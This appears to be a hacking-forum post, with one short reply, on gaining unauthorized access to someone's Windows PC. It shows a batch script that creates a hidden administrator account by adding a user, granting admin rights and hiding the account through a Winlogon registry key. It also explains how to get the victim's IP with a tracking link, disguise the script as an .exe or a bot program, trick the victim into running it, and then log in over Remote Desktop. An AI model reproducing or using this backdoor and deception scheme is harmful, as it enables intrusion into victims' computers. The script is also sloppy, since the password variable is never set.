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How to HACK and Access Someone PC's ! [Legit Way]

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 First of all, you need the IP Address of your victim

 IP Address: Generate a Link which you send to your victim. If he clicks it, his IP will be sent to your email inbox.



Then, open up notepad and write this commands:[/align]




REM "WhatEverYouWantNameIt"

REM ------------------------------

@echo off

set /p user=PLS INSERT YOUR USER :


net user /add %user% %pass%

net localgroup administrators /add %user%

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0



it's done! save it as the batch file (.bat) and named whatever you want.


ok after get him IP address you need to give them this batch file!

for that, you can change it to .exe file or put this Batch in a program file, you can put in an instagrambot or viewbot or anything, and name it to program name! and told the victim to open it first! if he/she click on it make a HiddenUser on the Computer

and what you gonna do is connect him with Remote access app(you can find it on windows search bar) and IP address you got before! 



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im gonna check it

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